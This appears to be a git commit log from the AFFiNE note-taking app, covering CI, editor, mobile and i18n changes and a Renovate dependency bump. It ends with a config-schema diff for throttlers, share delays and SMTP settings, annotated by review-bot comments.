- Wide toolbars could overflow the viewport

<img
src="https://github.com/user-attachments/assets/8f54590c-1d2c-4c87-abab-32206df17ebf"
width="250">

## Solution
- Use fixed positioning at bottom of screen on mobile devices
- Position toolbar above virtual keyboard using Visual Viewport API
- Handle toolbar visibility directly via `selectionchange` event
- Bypass flag-based rendering system on mobile to avoid rendering issues
- Add `touchend` listener to handle long-press text selection
- Limit toolbar max-width to viewport minus padding
- Enable horizontal scrolling for overflow content

<img
src="https://github.com/user-attachments/assets/45130860-f01a-45c1-87c5-d43264f88613"
width="250">

## Test plan
- [x] Tested on mobile Safari (iOS)
- [x] Tested on mobile Chrome (Android)
- [x] Verified desktop browsers still work correctly
- [x] Verified the toolbar is fixed to the bottom of the screen and
above virtual keyboard
- [x] Verified long-press text selection triggers toolbar

## Summary by CodeRabbit

* **Improvements**
* Mobile toolbar now anchors to the bottom, adapts width, and
repositions dynamically to stay above on-screen keyboards.
* Toolbar visibility is context-aware, showing when native-like text
selections occur and hiding otherwise; touch interactions are handled
for reliable toggling.
  * Desktop experience and public APIs remain unchanged.


---------

Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-02-24 01:36:09 +08:00
DarkSky e617740974 chore: improve cors 2026-02-24 00:51:08 +08:00
DarkSky 744c78abbb feat(infra): improve ci perf (#14503)
#### PR Dependency Tree


* **PR #14503** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Chores**
* Improved CI efficiency with targeted Rust test detection and
workspace-scoped builds for faster, more focused runs.
* Added workflow static-analysis configuration and refined
Node/Playwright/Electron build flags and platform controls.
* Added a new test workspace dependency and TypeScript project reference
for blocksuite tests; updated workspace wiring for focused builds.
  * Cleaned CI environment handling for server test orchestration.

* **Bug Fixes**
* Hardened mobile release steps (safer credential handling and quoting)
to improve iOS/Android publish reliability.
2026-02-23 21:52:17 +08:00
DarkSky 91c5869053 feat: improve selfhosted login (#14502)
fix #13397
fix #14011

#### PR Dependency Tree


* **PR #14502** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
* Centralized CORS policy with dynamic origin validation applied to
server and realtime connections
* Improved sign-in flows with contextual, localized error hints and
toast notifications
* Centralized network-error normalization and conditional OAuth provider
fetching

* **Bug Fixes**
* Better feedback for self-hosted connection failures and clearer
authentication error handling
* More robust handling of network-related failures with user-friendly
messages
2026-02-23 21:23:01 +08:00
DarkSky 6d805b302c docs: cleanup outdated infos 2026-02-23 21:03:13 +08:00
Pixel Perfect fb9f49b948 fix(data-view): preserve filtering on hidden properties (#14500)
Fixes issue #14036 where hiding a column used in filters caused empty
table/kanban results.

Root cause: filter evaluation built the row map from visible properties
only.

Change: evaluate filters using full property set (propertiesRaw$) so
hidden filtered columns still participate.

Added unit regressions for both table and kanban hidden-column filtering
behavior.

Verified this does fix the filtering issue for hidden columns:

<img width="3440" height="1440" alt="Screenshot of before and after
views of a database with hidden columns and filtering on said column"
src="https://github.com/user-attachments/assets/c1e2674f-06be-44e9-97bd-63593172f05b"
/>

## Summary by CodeRabbit

* **Bug Fixes**
* Fixed filtering in Kanban and Table views so filters evaluate against
all properties (including hidden/raw columns), ensuring consistent
results regardless of column visibility.
* **Tests**
* Added tests covering filtering behavior with hidden and filtered
columns to prevent regressions.
2026-02-23 20:45:12 +08:00
DarkSky ef6717e59a fix(editor): editor behavior and styles (#14498)
fix #14269 
fix #13920
fix #13977
fix #13953
fix #13895
fix #13905
fix #14136
fix #14357
fix #14491

#### PR Dependency Tree


* **PR #14498** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Bug Fixes**
  * Callout and toolbar defaults now reliably show grey backgrounds
  * Keyboard shortcuts behave better across layouts and non-ASCII input
  * Deleted workspaces no longer appear in local listings

* **New Features**
  * Cell editing now respects pre-entry validation hooks
* Scrollbars use themeable variables and include Chromium compatibility
fixes

* **Style**
  * Minor UI color adjustment for hidden properties

* **Tests**
  * Added unit tests for table column handling and keymap behavior
2026-02-23 06:37:16 +08:00
DarkSky ad988dbd1e chore: trim useless files for client (#14488)
#### PR Dependency Tree


* **PR #14488** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Chores**
* Improved Electron build to trim unused locale files on macOS, Windows,
and Linux while always preserving English fallbacks; added post-build
cleanup and stricter packaging ignore rules to exclude tests, examples,
scripts, docs, README, and build metadata.
* **Style**
  * Reformatted a TypeScript type annotation for consistency.
2026-02-22 17:17:42 +08:00
DarkSky 3d01766f55 fix: history may duplicate on concurrency (#14487)
#### PR Dependency Tree


* **PR #14487** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)


## Summary by CodeRabbit

* **Bug Fixes**
* Enhanced history record creation to prevent duplicate entries in
concurrent scenarios.

* **Tests**
  * Added validation for idempotent history record creation.

2026-02-22 02:13:51 +08:00
DarkSky 2414aa5848 feat: improve admin build (#14485)
#### PR Dependency Tree


* **PR #14485** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Chores**
  * Admin static assets now served under /admin for self-hosted installs
  * CLI is directly executable from the command line
  * Build tooling supports a configurable self-hosted public path
  * Updated admin package script for adding UI components
* Added a PostCSS dependency and plugin to the build toolchain for admin
builds

* **Style**
* Switched queue module to a local queuedash stylesheet, added queuedash
Tailwind layer, and scoped queuedash styles for the admin UI

* **Bug Fixes**
  * Improved error propagation in the Electron renderer
* Migration compatibility to repair a legacy checksum during native
storage upgrades

* **Tests**
  * Added tests covering the migration repair flow
2026-02-21 23:25:05 +08:00
DarkSky 0de1bd0da8 feat: bump deps (#14484) 2026-02-21 08:04:18 +08:00
DarkSky 186ec5431d fix: android build 2026-02-21 05:12:12 +08:00
DarkSky da57bfe8e7 fix: enhance MCP token handling (#14483)
fix #14475 

#### PR Dependency Tree


* **PR #14483** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)


## Summary by CodeRabbit

## Release Notes

* **New Features**
* Enhanced MCP server token management with improved security—tokens now
display only once with redaction support.
* Updated token creation and deletion workflows with clearer UI state
controls.
* Added tooltip guidance when copying configuration with redacted
tokens.

2026-02-21 04:14:14 +08:00
DarkSky c9bffc13b5 feat: improve mobile native impl (#14481)
fix #13529 

#### PR Dependency Tree


* **PR #14481** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
* Mobile blob caching with file-backed storage for faster loads and
reduced network usage
* Blob decoding with lazy refresh on token-read failures for improved
reliability
  * Full-text search/indexing exposed to mobile apps
* Document sync APIs and peer clock management for robust cross-device
sync

* **Tests**
* Added unit tests covering payload decoding, cache safety, and
concurrency

* **Dependencies**
* Added an LRU cache dependency and a new mobile-shared package for
shared mobile logic
2026-02-21 04:13:24 +08:00
DarkSky d8cc0acdd0 chore: update flags 2026-02-19 10:18:43 +08:00
Neo 35e1411407 fix: docTitle unexpectedly translated (#14467)
fix #14465

In Chinese mode, the document with the specified name may not be
displayed correctly in the sidebar, and it may be mistaken for the
translation of the content that needs to be translated.


## Summary by CodeRabbit

* **Bug Fixes**
* Fixed document title display in navigation panels on desktop and
mobile to properly render without additional processing steps.

2026-02-17 13:45:31 +00:00
DarkSky 8f833388eb feat: improve admin panel design (#14464) 2026-02-17 17:40:29 +08:00
DarkSky 850e646ab9 fix: electon rendering on windows (#14456)
fix #14450
fix #14401
fix #13983
fix #12766
fix #14404
fix #12019

#### PR Dependency Tree


* **PR #14456** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)


## Summary by CodeRabbit

* **New Features**
* Added new tab navigation functions: `switchTab`, `switchToNextTab`,
and `switchToPreviousTab`.

* **Bug Fixes**
  * Improved bounds validation for tab view resizing.
  * Enhanced tab lifecycle management during navigation events.
  * Refined background throttling behavior for active tabs.

2026-02-16 14:08:26 +08:00
DarkSky 728e02cab7 feat: bump eslint & oxlint (#14452)
#### PR Dependency Tree


* **PR #14452** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Bug Fixes**
* Improved null-safety, dependency tracking, upload validation, and
error logging for more reliable uploads, clipboard, calendar linking,
telemetry, PDF/theme printing, and preview/zoom behavior.
* Tightened handling of all-day calendar events (missing date now
reported).

* **Deprecations**
  * Removed deprecated RadioButton and RadioButtonGroup; use RadioGroup.

* **Chores**
* Unified and upgraded linting/config, reorganized imports, and
standardized binary handling for more consistent builds and tooling.
2026-02-16 13:52:08 +08:00
DarkSky 792164edd1 fix: sign 2026-02-16 12:23:26 +08:00
DarkSky e3177e6837 feat: normalize search text (#14449)
#### PR Dependency Tree


* **PR #14449** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Improvements**
* Search text normalization now applied consistently across doc titles,
search results, and highlights for uniform display formatting.

* **Tests**
* Added comprehensive test coverage for search text normalization
utility.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-16 08:07:04 +08:00
DarkSky 42f2d2b337 feat: support markdown preview (#14447) 2026-02-15 21:05:52 +08:00
DarkSky 9d7f4acaf1 fix: s3 upload compatibility (#14445)
fix #14432 

#### PR Dependency Tree


* **PR #14445** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Improved file upload handling to ensure consistent support for
different data formats during object and multipart uploads.
* Enhanced type safety throughout storage and workflow components by
removing unnecessary type assertions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-15 19:16:36 +08:00
DarkSky 9a1f600fc9 chore: update i18n status 2026-02-15 14:59:52 +08:00
steffenrapp 0f906ad623 feat(i18n): update German translation (#14444)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Chat panel: session management, history loading, embedding progress,
and deletion flow
* Document analytics: views, unique visitors, guest metrics, charts,
viewers and paywall messaging
* Calendar integration: expanded account/provider states, errors and
flow copy; DOCX import tooltip
  * Appearance: image antialiasing option and window-behavior toggles
  * Workspace sharing: visibility controls and related tooltips

* **Improvements**
* Expanded error and empty-state wording, subscription/payment
description, and experimental feature labels
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-15 14:57:47 +08:00
DarkSky 09aa65c52a feat: improve ci 2026-02-15 14:53:35 +08:00
DarkSky 25227a09f7 feat: improve grouping perf in edgeless (#14442)
fix #14433 

#### PR Dependency Tree


* **PR #14442** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Level-of-detail thumbnails for large images.
  * Adaptive pacing for snapping, distribution and other alignment work.
  * RAF coalescer utility to batch high-frequency updates.
  * Operation timing utility to measure synchronous work.

* **Improvements**
* Batch group/ungroup reparenting that preserves element order and
selection.
  * Coalesced panning and drag updates to reduce jitter.
* Connector/group indexing for more reliable updates, deletions and
sync.
  * Throttled viewport refresh behavior.

* **Documentation**
  * Docs added for RAF coalescer and measureOperation.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-15 03:17:22 +08:00
DarkSky c0694c589b fix: editor style (#14440)
#### PR Dependency Tree


* **PR #14440** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Style**
* Refined CSS styling rules in workspace detail pages for improved
layout rendering consistency.
* Enhanced editor container display handling during loading states to
ensure proper layout adjustments.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-14 19:12:24 +08:00
DarkSky 819402d9f1 feat: asset upload with retry 2026-02-14 17:24:22 +08:00
DarkSky 33bc3e2fe9 feat: improve ci (#14438)
#### PR Dependency Tree


* **PR #14438** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Refined PR trigger automation to run only on open/reopen/synchronize
events
* Split native CI into platform-specific builds (Linux, Windows, macOS)
for more reliable pipelines
* Added conditional Copilot test gating to run API/E2E tests only when
relevant
* Added conditional PR-title lint skip when edits don't change the title
  * Improved test result uploads and artifact handling for gated flows
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-14 16:59:49 +08:00
DarkSky 2b71b3f345 feat: improve test & bundler (#14434)
#### PR Dependency Tree


* **PR #14434** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Introduced rspack bundler as an alternative to webpack for optimized
builds.

* **Tests & Quality**
* Added comprehensive editor semantic tests covering markdown, hotkeys,
and slash-menu operations.
* Expanded CI cross-browser testing to Chromium, Firefox, and WebKit;
improved shape-rendering tests to account for zoom.

* **Bug Fixes**
  * Corrected CSS overlay styling for development servers.
  * Fixed TypeScript typings for build tooling.

* **Other**
  * Document duplication now produces consistent "(n)" suffixes.
  * French i18n completeness increased to 100%.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-14 16:09:09 +08:00
dcornuel-del 3bc28ba78c feat(i18n): update French translations for various keys (#14437)
added definition

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Documentation**
* Enhanced French language support with improved grammar, gender
neutrality, and consistency across UI text.
  * Added French translations for new AI-powered features.
* Refined French phrasing in prompts, tooltips, and messages for better
clarity and natural language flow.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-14 14:43:22 +08:00
DarkSky 72df9cb457 feat: improve editor performance (#14429)
#### PR Dependency Tree


* **PR #14429** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* HTML import now splits lines on <br> into separate paragraphs while
preserving inline formatting.

* **Bug Fixes**
* Paste falls back to inserting after the first paragraph when no
explicit target is found.

* **Style**
  * Improved page-mode viewport styling for consistent content layout.

* **Tests**
* Added snapshot tests for <br>-based paragraph splitting; re-enabled an
e2e drag-page test.

* **Chores**
* Deferred/deduplicated font loading, inline text caching,
drag-handle/pointer optimizations, and safer inline render
synchronization.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-14 00:43:36 +08:00
DarkSky 98e5747fdc feat: merge service 2026-02-13 21:52:11 +08:00
DarkSky 4460604dd3 fix: migration compatibility 2026-02-13 03:12:26 +08:00
DarkSky b4be9118ad feat: doc status & share status (#14426)
#### PR Dependency Tree


* **PR #14426** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Admin dashboard: view workspace analytics (storage, sync activity, top
shared links) with charts and configurable windows.
* Document analytics tab: see total/unique/guest views and trends over
selectable time windows.
* Last-accessed members: view who last accessed a document, with
pagination.
* Shared links analytics: browse and paginate all shared links with
view/unique/guest metrics and share URLs.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-13 01:01:29 +08:00
Lakr b46bf91575 fix(ios): add AI privacy consent alert (#14421)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **New Features**
* Added AI feature consent flow requiring user agreement before enabling
AI capabilities.
* Added calendar integration support including CalDAV account linking
and management.
* Expanded workspace administration capabilities with detailed workspace
analytics and configuration options.

* **Improvements**
  * Enhanced workspace sharing and configuration controls.
  * Added support for calendar provider presets and subscriptions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-12 18:25:18 +08:00
DarkSky 3ad482351b fix: server init (#14412)
#### PR Dependency Tree


* **PR #14412** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
  * Improved internal code organization for better maintainability.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-10 16:18:22 +08:00
DarkSky 03b1d15a8f chore: adjust resource 2026-02-10 14:41:43 +08:00
renovate[bot] 52c7b04a01 chore: bump up @vitejs/plugin-react-swc version to v4 (#14405)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@vitejs/plugin-react-swc](https://redirect.github.com/vitejs/vite-plugin-react/tree/main/packages/plugin-react-swc#readme)
([source](https://redirect.github.com/vitejs/vite-plugin-react/tree/HEAD/packages/plugin-react-swc))
| [`^3.7.2` →
`^4.0.0`](https://renovatebot.com/diffs/npm/@vitejs%2fplugin-react-swc/3.9.0/4.2.3)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@vitejs%2fplugin-react-swc/4.2.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@vitejs%2fplugin-react-swc/3.9.0/4.2.3?slim=true)
|

---

### Release Notes

<details>
<summary>vitejs/vite-plugin-react
(@vitejs/plugin-react-swc)</summary>

###
[`v4.2.3`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#423-2026-02-02)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/5e600a31ec27fae54df58a46ef1fffa80238042e...12914fa8c1d32323db6a134d46cd0ca83db91cd1)

###
[`v4.2.2`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#422-2025-11-12)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/v4.2.1...5e600a31ec27fae54df58a46ef1fffa80238042e)

##### Update code to support newer `rolldown-vite`
([#978](https://redirect.github.com/vitejs/vite-plugin-react/pull/978))

`rolldown-vite` will remove `optimizeDeps.rollupOptions` in favor of
`optimizeDeps.rolldownOptions` soon. This plugin now uses
`optimizeDeps.rolldownOptions` to support newer `rolldown-vite`. Please
update `rolldown-vite` to the latest version if you are using an older
version.

###
[`v4.2.1`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#421-2025-11-05)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/v4.2.0...v4.2.1)

##### Fix `@vitejs/plugin-react-swc/preamble` on build
([#962](https://redirect.github.com/vitejs/vite-plugin-react/pull/962))

###
[`v4.2.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#420-2025-10-24)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/v4.1.0...v4.2.0)

##### Add `@vitejs/plugin-react-swc/preamble` virtual module for SSR HMR
([#890](https://redirect.github.com/vitejs/vite-plugin-react/pull/890))

SSR applications can now initialize HMR runtime by importing
`@vitejs/plugin-react-swc/preamble` at the top of their client entry
instead of manually calling `transformIndexHtml`. This simplifies SSR
setup for applications that don't use the `transformIndexHtml` API.

##### Use SWC when useAtYourOwnRisk\_mutateSwcOptions is provided
([#951](https://redirect.github.com/vitejs/vite-plugin-react/pull/951))

Previously, this plugin did not use SWC if plugins were not provided
even if `useAtYourOwnRisk_mutateSwcOptions` was provided. This is now
fixed.

###
[`v4.1.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#410-2025-09-17)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/f21864b102d40fca4f70dfe9112a10101ec12f54...v4.1.0)

##### Set SWC cacheRoot options

This is set to `{viteCacheDir}/swc` and overrides the default of `.swc`.

##### Perf: simplify refresh wrapper generation
([#835](https://redirect.github.com/vitejs/vite-plugin-react/pull/835))

###
[`v4.0.1`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#401-2025-08-19)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/590f394c1e451987258ed64a4b5fb6207c5e8261...f21864b102d40fca4f70dfe9112a10101ec12f54)

##### Set `optimizeDeps.rollupOptions.transform.jsx` instead of
`optimizeDeps.rollupOptions.jsx` for rolldown-vite
([#735](https://redirect.github.com/vitejs/vite-plugin-react/pull/735))

`optimizeDeps.rollupOptions.jsx` is going to be deprecated in favor of
`optimizeDeps.rollupOptions.transform.jsx`.

###
[`v4.0.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#400-2025-08-07)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/9e0c1038959e828865be810a164a51c3db1ac375...590f394c1e451987258ed64a4b5fb6207c5e8261)

###
[`v3.11.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#3110-2025-07-18)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/32d49ecf9b15e3070c7abe5a176252a3fe542e5c...9e0c1038959e828865be810a164a51c3db1ac375)

##### Add HMR support for compound components
([#518](https://redirect.github.com/vitejs/vite-plugin-react/pull/518))

HMR now works for compound components like this:

```tsx
const Root = () => <div>Accordion Root</div>
const Item = () => <div>Accordion Item</div>

export const Accordion = { Root, Item }
```

##### Return `Plugin[]` instead of `PluginOption[]`
([#537](https://redirect.github.com/vitejs/vite-plugin-react/pull/537))

The return type has changed from `react(): PluginOption[]` to the more
specialized type `react(): Plugin[]`. This allows for type-safe
manipulation of plugins, for example:

```tsx
// previously this causes type errors
react()
  .map(p => ({ ...p, applyToEnvironment: e => e.name === 'client' }))
```

###
[`v3.10.2`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#3102-2025-06-10)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/8ce7183265c43f88623655a9cfdcec5282068f9b...32d49ecf9b15e3070c7abe5a176252a3fe542e5c)

##### Suggest `@vitejs/plugin-react-oxc` if rolldown-vite is detected
[#491](https://redirect.github.com/vitejs/vite-plugin-react/pull/491)

Emit a log which recommends `@vitejs/plugin-react-oxc` when
`rolldown-vite` is detected to improve performance and use Oxc under the
hood. The warning can be disabled by setting `disableOxcRecommendation:
true` in the plugin options.

##### Use `optimizeDeps.rollupOptions` instead of
`optimizeDeps.esbuildOptions` for rolldown-vite
[#489](https://redirect.github.com/vitejs/vite-plugin-react/pull/489)

This suppresses the warning about `optimizeDeps.esbuildOptions` being
deprecated in rolldown-vite.

##### Add Vite 7-beta to peerDependencies range
[#497](https://redirect.github.com/vitejs/vite-plugin-react/pull/497)

React plugins are compatible with Vite 7, this removes the warning when
testing the beta.

###
[`v3.10.1`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#3101-2025-06-03)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/dcadcfc2841c0bedfe44279c556835c350dfa5fa...8ce7183265c43f88623655a9cfdcec5282068f9b)

##### Add explicit semicolon in preambleCode
[#485](https://redirect.github.com/vitejs/vite-plugin-react/pull/485)

This fixes an edge case when using HTML minifiers that strip line
breaks aggressively.

###
[`v3.10.0`](https://redirect.github.com/vitejs/vite-plugin-react/blob/HEAD/packages/plugin-react-swc/CHANGELOG.md#3100-2025-05-23)

[Compare
Source](https://redirect.github.com/vitejs/vite-plugin-react/compare/4a944487aabe4db16660f4196e1d6eed79edf0e0...dcadcfc2841c0bedfe44279c556835c350dfa5fa)

##### Add `filter` for rolldown-vite
[#470](https://redirect.github.com/vitejs/vite-plugin-react/pull/470)

Added `filter` so that it is more performant when running this plugin
with rolldown-powered version of Vite.

##### Skip HMR preamble in Vitest browser mode
[#478](https://redirect.github.com/vitejs/vite-plugin-react/pull/478)

This was causing annoying `Sourcemap for "/@react-refresh" points
to missing source files` and is unnecessary in test mode.

##### Skip HMR for JSX files with hooks
[#480](https://redirect.github.com/vitejs/vite-plugin-react/pull/480)

This removes the HMR warning for hooks with JSX.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-02-10 03:22:15 +00:00
2568 changed files with 189465 additions and 67118 deletions
+5
@@ -19,3 +19,8 @@ rustflags = [
# pthread_key_create() destructors and segfault after a DSO unloading
[target.'cfg(all(target_env = "gnu", not(target_os = "windows")))']
rustflags = ["-C", "link-args=-Wl,-z,nodelete"]
# Temporary local llm_adapter override.
# Uncomment when verifying AFFiNE against the sibling llm_adapter workspace.
# [patch.crates-io]
# llm_adapter = { path = "../llm_adapter" }
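Review bot: The commented-out `[patch.crates-io]` block at the end of this hunk points `llm_adapter` at `../llm_adapter`, a path outside the repository, and it sits in the tracked Cargo config, so one accidental uncomment in a commit makes every build resolve that crate from whatever is in the sibling directory instead of the registry version. Suggest keeping the override in an untracked local config, or adding a CI check that fails when an active `[patch.crates-io]` section is present. The comment says "Temporary" without saying when it goes away; a linked issue would help.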
+113 -82
@@ -62,6 +62,18 @@
"concurrency": 10
}
},
"queues.calendar": {
"type": "object",
"description": "The config for calendar job queue\n@default {\"concurrency\":4}",
"properties": {
"concurrency": {
"type": "number"
}
},
"default": {
"concurrency": 4
}
},
"queues.doc": {
"type": "object",
"description": "The config for doc job queue\n@default {\"concurrency\":1}",
@@ -123,17 +135,17 @@
},
"throttlers.default": {
"type": "object",
"description": "The config for the default throttler.\n@default {\"ttl\":60,\"limit\":120}",
"description": "The config for the default throttler.\n@default {\"ttl\":60000,\"limit\":120}",
"default": {
"ttl": 60,
"ttl": 60000,
"limit": 120
}
},
"throttlers.strict": {
"type": "object",
"description": "The config for the strict throttler.\n@default {\"ttl\":60,\"limit\":20}",
"description": "The config for the strict throttler.\n@default {\"ttl\":60000,\"limit\":20}",
"default": {
"ttl": 60,
"ttl": 60000,
"limit": 20
}
}
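Review bot: The default `ttl` in `throttlers.default` and `throttlers.strict` goes from 60 to 60000 while `limit` is unchanged, which reads as a unit change, but neither description names the unit. If the unit did move from seconds to milliseconds, a self-hosted config that still carries `"ttl": 60` ends up with a window 1000 times shorter than intended, which loosens the strict throttler considerably. Suggest stating the unit in both descriptions and flagging the change in the upgrade notes.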
@@ -163,6 +175,11 @@
"description": "Whether require email verification before accessing restricted resources(not implemented).\n@default true",
"default": true
},
"newAccountShareActionDelay": {
"type": "number",
"description": "Minimum account age in seconds before new accounts can invite members or create share links.\n@default 86400",
"default": 86400
},
"passwordRequirements": {
"type": "object",
"description": "The password strength requirements when set new password.\n@default {\"min\":8,\"max\":32}",
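Review bot: `newAccountShareActionDelay` is declared as a bare `number`, so the schema accepts negative and fractional values and does not say whether 0 disables the delay. Suggest adding `"minimum": 0` and documenting the 0 case in the description. The unit here is seconds while the throttler `ttl` defaults elsewhere in this schema are now 60000, so it is worth making the unit obvious in every duration setting.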
@@ -197,8 +214,8 @@
"properties": {
"SMTP.name": {
"type": "string",
"description": "Name of the email server (e.g. your domain name)\n@default \"AFFiNE Server\"\n@environment `MAILER_SERVERNAME`",
"default": "AFFiNE Server"
"description": "Hostname used for SMTP HELO/EHLO (e.g. mail.example.com). Leave empty to use the system hostname.\n@default \"\"\n@environment `MAILER_SERVERNAME`",
"default": ""
},
"SMTP.host": {
"type": "string",
@@ -222,7 +239,7 @@
},
"SMTP.sender": {
"type": "string",
"description": "Sender of all the emails (e.g. \"AFFiNE Self Hosted <noreply@example.com>\")\n@default \"AFFiNE Self Hosted <noreply@example.com>\"\n@environment `MAILER_SENDER`",
"description": "Sender of all the emails (e.g. \"AFFiNE Self Hosted &lt;noreply@example.com&gt;\")\n@default \"AFFiNE Self Hosted <noreply@example.com>\"\n@environment `MAILER_SENDER`",
"default": "AFFiNE Self Hosted <noreply@example.com>"
},
"SMTP.ignoreTLS": {
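Review bot: In the `SMTP.sender` description only the example address is escaped to `&lt;noreply@example.com&gt;`; the `@default` value later in the same string still contains a raw `<noreply@example.com>`. If the escaping is there because the description is rendered as HTML, the default will still be swallowed as a tag. Suggest escaping both occurrences in the description and leaving the `default` value itself unescaped.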
@@ -237,8 +254,8 @@
},
"fallbackSMTP.name": {
"type": "string",
"description": "Name of the fallback email server (e.g. your domain name)\n@default \"AFFiNE Server\"",
"default": "AFFiNE Server"
"description": "Hostname used for fallback SMTP HELO/EHLO (e.g. mail.example.com). Leave empty to use the system hostname.\n@default \"\"",
"default": ""
},
"fallbackSMTP.host": {
"type": "string",
@@ -262,7 +279,7 @@
},
"fallbackSMTP.sender": {
"type": "string",
"description": "Sender of all the emails (e.g. \"AFFiNE Self Hosted <noreply@example.com>\")\n@default \"\"",
"description": "Sender of all the emails (e.g. \"AFFiNE Self Hosted &lt;noreply@example.com&gt;\")\n@default \"\"",
"default": ""
},
"fallbackSMTP.ignoreTLS": {
@@ -288,6 +305,22 @@
}
